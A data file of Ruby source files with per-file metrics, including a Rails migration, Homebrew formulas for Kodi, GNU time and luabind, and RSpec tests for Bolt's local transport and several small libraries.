f79b5740be097d69dac4da54b68627c34e2cd47f | 1,289 | class AddOriginalLanguageIdToEtymologies < ActiveRecord::Migration
def self.up
add_column :etymologies, :original_language_id, :integer
say_with_time "Associating Languages with Etymologies..." do
etyma = Etymology.find(:all, :select => :source_language)
etyma.collect(&:source_language).uniq.each do |langname|
if ["Latin", "", "Kirumb"].include? langname
lang = case langname
when "Latin"
Language.find_or_create_by_iso_639_code("la")
when "Kirumb"
Language.find_or_create_by_iso_639_code("art-kirumb")
when ""
nil
end
else
lang = Language.find_or_create_by_default_name(langname)
end
Etymology.update_all(["original_language_id = ?", lang.try(:id)], ["source_language = ?", langname])
end
end
remove_column :etymologies, :source_language
end
def self.down
add_column :etymologies, :source_language
say_with_time "Restoring language names to etymologies..." do
Language.find(:all).each do |lang|
Etymology.update_all(["source_language = ?", lang.name], ["original_language_id = ?", lang.id])
end
end
remove_column :etymologies, :original_language_id
end
end
| 31.439024 | 108 | 0.648565 |
ab563558a577f1ec744ee8859eea3131ac59aae0 | 523 | cask "kodi" do
version "18.7-Leia"
sha256 "88822a1a4aa3dba8959cf84a49fb65ec2dd93ab08fc38467bd8af927707ba153"
url "https://mirrors.kodi.tv/releases/osx/x86_64/kodi-#{version}-x86_64.dmg"
appcast "https://github.com/xbmc/xbmc/releases.atom"
name "Kodi"
homepage "https://kodi.tv/"
app "Kodi.app"
zap trash: [
"~/.kodi",
"~/Library/Application Support/Kodi",
"~/Library/Logs/kodi.log",
"~/Library/Logs/kodi.old.log",
"~/Library/Saved Application State/org.xbmc.kodi.savedState",
]
end
| 26.15 | 78 | 0.692161 |
01689dec6e2a698feed51a018ccfba6d92f95ded | 1,576 | class GnuTime < Formula
desc "GNU implementation of time utility"
homepage "https://www.gnu.org/software/time/"
url "https://ftpmirror.gnu.org/time/time-1.7.tar.gz"
mirror "https://ftp.gnu.org/gnu/time/time-1.7.tar.gz"
sha256 "e37ea79a253bf85a85ada2f7c632c14e481a5fd262a362f6f4fd58e68601496d"
bottle do
cellar :any_skip_relocation
revision 1
sha256 "3c998fed1b824483f0fd140a0b12164ebc6bd100371dca11291d3406a26ecc47" => :el_capitan
sha256 "d0b40a36430314f548ab3e5d362c3695b9ab38e83933a7a459deaccfa705232f" => :yosemite
sha256 "f69ffe3bd6748843ff7013c016bf69a58efde8fb936251b0f6e9e4a2352e1450" => :mavericks
sha256 "0b28fad39645760e643d90a93c994df01151d4ff43dc8b3c63efa8d59d17783f" => :mountain_lion
end
option "with-default-names", "Do not prepend 'g' to the binary"
# Fixes issue with main returning void rather than int
# https://trac.macports.org/ticket/32860
# https://trac.macports.org/browser/trunk/dports/sysutils/gtime/files/patch-time.c.diff?rev=88924
patch :DATA
def install
args = [
"--prefix=#{prefix}",
"--mandir=#{man}",
"--info=#{info}"
]
args << "--program-prefix=g" if build.without? "default-names"
system "./configure", *args
system "make", "install"
end
test do
system bin/"gtime", "ruby", "--version"
end
end
__END__
diff --git a/time.c b/time.c
index 9d5cf2c..97611f5 100644
--- a/time.c
+++ b/time.c
@@ -628,7 +628,7 @@ run_command (cmd, resp)
signal (SIGQUIT, quit_signal);
}
-void
+int
main (argc, argv)
int argc;
char **argv;
| 28.142857 | 99 | 0.708122 |
bbfbf90ba04ea945260a07c34fed272dc844ca52 | 398 | module Outpost
module Secretary
module UserInjection
extend ActiveSupport::Concern
included do
before_filter :add_user_id_to_params, only: [:create, :update]
end
private
def add_user_id_to_params
if model.has_secretary?
params[model.singular_route_key].merge!(logged_user_id: current_user.id)
end
end
end
end
end
| 19.9 | 82 | 0.663317 |
613c78a2503e6889c8cddd755a54014ecfa9672b | 3,682 | class Luabind < Formula
desc "Library for bindings between C++ and Lua"
homepage "https://github.com/luabind/luabind"
url "https://downloads.sourceforge.net/project/luabind/luabind/0.9.1/luabind-0.9.1.tar.gz"
sha256 "80de5e04918678dd8e6dac3b22a34b3247f74bf744c719bae21faaa49649aaae"
license "MIT"
revision 2
bottle do
cellar :any
sha256 "aa095d38915e09287c86d11d65871b5a4e6604799a961f0e055c9bf526ba403b" => :mojave
sha256 "736bb4cb6a49338eecab9a179f3104e8328d7133366b921b2fece14b6fd2aa26" => :high_sierra
sha256 "39e74593d47fd648230e177e9a8a90e1b3a888c84d6c7d38f358265d5b93ce94" => :sierra
sha256 "914a79679264790d9ffb0726a1f303954d816da3dd23db3b8816873cf467677f" => :el_capitan
sha256 "171123f48a6cf2431d6b143b84bf31dbb955f103195aa30597a61b7a61943982" => :yosemite
end
depends_on "boost-build" => :build
depends_on "boost"
depends_on "[email protected]"
# boost 1.57 compatibility
# https://github.com/Homebrew/homebrew/pull/33890#issuecomment-67723688
# https://github.com/luabind/luabind/issues/27
patch do
url "https://gist.githubusercontent.com/tdsmith/e6d9d3559ec1d9284c0b/raw/4ac01936561ef9d7541cf8e78a230bebef1a8e10/luabind.diff"
sha256 "f22a283752994e821922316a5ef3cbb16f7bbe15fc64d97c02325ed4aaa53985"
end
# patch Jamroot to perform lookup for shared objects with .dylib suffix
patch do
url "https://gist.githubusercontent.com/DennisOSRM/3728987/raw/052251fcdc23602770f6c543be9b3e12f0cac50a/Jamroot.diff"
sha256 "bc06d76069d08af4dc55a102f963931a0247173a36ad0ae43e11d82b23f8d2b3"
end
# apply upstream commit to enable building with clang
patch do
url "https://github.com/luabind/luabind/commit/3044a9053ac50977684a75c4af42b2bddb853fad.diff?full_index=1"
sha256 "d04cbe7e5ed732943b1caf547321ac81b1db49271a5956a5f218905016c8900e"
end
# include C header that is not pulled in automatically on OS X 10.9 anymore
# submitted https://github.com/luabind/luabind/pull/20
patch do
url "https://gist.githubusercontent.com/DennisOSRM/a246514bf7d01631dda8/raw/0e83503dbf862ebfb6ac063338a6d7bca793f94d/object_rep.diff"
sha256 "2fef524ac5e319d7092fbb28f6d4e3d3eccd6a570e7789a9b5b0c9a25e714523"
end
def install
ENV["LUA_PATH"] = Formula["[email protected]"].opt_prefix
args = %w[release install]
case ENV.compiler
when :clang
args << "--toolset=clang"
when :gcc
args << "--toolset=darwin"
end
args << "--prefix=#{prefix}"
system "bjam", *args
(lib/"pkgconfig/luabind.pc").write pc_file
end
def pc_file
<<~EOS
prefix=#{HOMEBREW_PREFIX}
exec_prefix=${prefix}
libdir=${exec_prefix}/lib
includedir=${exec_prefix}/include
Name: luabind
Description: Library for bindings between C++ and Lua
Version: 0.9.1
Libs: -L${libdir} -lluabind
Cflags: -I${includedir}
EOS
end
test do
(testpath/"hello.cpp").write <<~EOS
extern "C" {
#include <lua.h>
}
#include <iostream>
#include <luabind/luabind.hpp>
void greet() { std::cout << "hello world!\\n"; }
extern "C" int init(lua_State* L)
{
using namespace luabind;
open(L);
module(L)
[
def("greet", &greet)
];
return 0;
}
EOS
system ENV.cxx, "-shared", "hello.cpp", "-o", "hello.dylib",
"-I#{Formula["[email protected]"].include}/lua-5.1",
"-L#{lib}", "-lluabind",
"-L#{Formula["[email protected]"].lib}", "-llua5.1"
output = `lua5.1 -e "package.loadlib('#{testpath}/hello.dylib', 'init')(); greet()"`
assert_match "hello world!", output
end
end
| 34.411215 | 137 | 0.695274 |
874401c65beb2089a5a4349d0781ddb19b2cc228 | 530 | require File.expand_path('../../../spec_helper', __FILE__)
ruby_version_is "1.9" do
describe "Fixnum#odd?" do
it "is false for zero" do
0.odd?.should be_false
end
it "is false for even positive Fixnums" do
4.odd?.should be_false
end
it "is false for even negative Fixnums" do
(-4).odd?.should be_false
end
it "is true for odd positive Fixnums" do
5.odd?.should be_true
end
it "is true for odd negative Fixnums" do
(-5).odd?.should be_true
end
end
end
| 20.384615 | 58 | 0.630189 |
871ed314cd38f09fe42bad7f37a728344c664815 | 5,516 | # frozen_string_literal: true
require 'spec_helper'
require 'bolt/transport/local'
require 'bolt/target'
require 'bolt/inventory'
require 'bolt/util'
require 'bolt_spec/transport'
require 'bolt_spec/conn'
require 'shared_examples/transport'
describe Bolt::Transport::Local do
include BoltSpec::Transport
let(:transport) { :local }
let(:host_and_port) { 'localhost' }
let(:safe_name) { host_and_port }
let(:user) { 'runner' }
let(:password) { 'runner' }
let(:os_context) { Bolt::Util.windows? ? windows_context : posix_context }
let(:config) { make_config }
let(:project) { Bolt::Project.new('.') }
let(:plugins) { Bolt::Plugin.setup(config, nil) }
let(:inventory) { Bolt::Inventory.create_version({}, config.transport, config.transports, plugins) }
let(:target) { make_target }
let(:transport_config) { {} }
def make_target
inventory.get_target(host_and_port)
end
it 'is always connected' do
expect(runner.connected?(target)).to eq(true)
end
include_examples 'transport api'
context 'running as another user', sudo: true do
include_examples 'with sudo'
context "overriding with '_run_as'" do
let(:transport_config) do
{
'sudo-password' => password,
'run-as' => 'root'
}
end
it "can override run_as for command via an option" do
expect(runner.run_command(target, 'whoami', run_as: user)['stdout']).to eq("#{user}\n")
end
it "can override run_as for script via an option" do
contents = "#!/bin/sh\nwhoami"
with_tempfile_containing('script test', contents) do |file|
expect(runner.run_script(target, file.path, [], run_as: user)['stdout']).to eq("#{user}\n")
end
end
it "can override run_as for task via an option" do
contents = "#!/bin/sh\nwhoami"
with_task_containing('tasks_test', contents, 'environment') do |task|
expect(runner.run_task(target, task, {}, run_as: user).message).to eq("#{user}\n")
end
end
it "can override run_as for file upload via an option" do
contents = "upload file test as root content"
dest = '/tmp/root-file-upload-test'
with_tempfile_containing('tasks test upload as root', contents) do |file|
expect(runner.upload(target, file.path, dest, run_as: user).message).to match(/Uploaded/)
expect(runner.run_command(target, "cat #{dest}", run_as: user)['stdout']).to eq(contents)
expect(runner.run_command(target, "stat -c %U #{dest}", run_as: user)['stdout'].chomp).to eq(user)
expect(runner.run_command(target, "stat -c %G #{dest}", run_as: user)['stdout'].chomp).to eq('docker')
end
runner.run_command(target, "rm #{dest}", sudoable: true, run_as: user)
end
end
context "as user with no password" do
let(:transport_config) do
{
'run-as' => 'root'
}
end
it "returns a failed result when a temporary directory is created" do
contents = "#!/bin/sh\nwhoami"
with_tempfile_containing('script test', contents) do |file|
expect {
runner.run_script(target, file.path, [])
}.to raise_error(Bolt::Node::EscalateError,
"Sudo password for user #{user} was not provided for #{host_and_port}")
end
end
end
end
context 'with large input and output' do
let(:file_size) { 1011 }
let(:str) { (0...1024).map { rand(65..90).chr }.join }
let(:arguments) { { 'input' => str * file_size } }
let(:ruby_task) do
<<~TASK
#!/usr/bin/env ruby
input = STDIN.read
STDERR.print input
STDOUT.print input
TASK
end
it "runs with large input and captures large output" do
with_task_containing('big_kahuna', ruby_task, 'stdin', '.rb') do |task|
result = runner.run_task(target, task, arguments).value
expect(result['input'].bytesize).to eq(file_size * 1024)
# Ensure the strings are the same
expect(result['input'][-1024..-1]).to eq(str)
end
end
context 'with run-as', sudo: true do
let(:transport_config) do
{
'sudo-password' => password,
'run-as' => 'root'
}
end
it "runs with large input and output" do
with_task_containing('big_kahuna', ruby_task, 'stdin', '.rb') do |task|
result = runner.run_task(target, task, arguments).value
expect(result['input'].bytesize).to eq(file_size * 1024)
expect(result['input'][-1024..-1]).to eq(str)
end
end
end
context 'with slow input' do
let(:file_size) { 10 }
let(:ruby_task) do
<<~TASK
#!/usr/bin/env ruby
while true
begin
input = STDIN.readpartial(1024)
sleep(0.2)
STDERR.print input
STDOUT.print input
rescue EOFError
break
end
end
TASK
end
it "runs with large input and captures large output" do
with_task_containing('slow_and_steady', ruby_task, 'stdin', '.rb') do |task|
result = runner.run_task(target, task, arguments).value
expect(result['input'].bytesize).to eq(file_size * 1024)
# Ensure the strings are the same
expect(result['input'][-1024..-1]).to eq(str)
end
end
end
end
end
| 32.447059 | 113 | 0.59826 |
3918e35e952ce0d4206e3898a16f7918106a3a55 | 201 | # frozen_string_literal: true
class AgendasController < ApplicationController
def show
@rooms = Room.all
@days = AgendaDay.all.includes(times: { agendas: %i[room speakers tags] })
end
end
| 22.333333 | 78 | 0.726368 |
62562546851844eea8b98f1718dd36dd6c45ddc3 | 565 | require File.expand_path('spec/spec_helper')
require 'colored2/object'
subject1 = red('hello')
subject2 = red('blue').on.blue
subject3 = on.yellow('on yellow')
RSpec.describe Object do
describe 'with foreground and background colors' do
it 'should work with one color' do
expect(subject1).to eql('hello'.red)
end
it 'should work with color on color' do
expect(subject2).to eql('blue'.red.on.blue)
end
it 'should add background color using on_<color>' do
expect(subject3).to eql('on yellow'.on.yellow)
end
end
end
| 22.6 | 56 | 0.688496 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.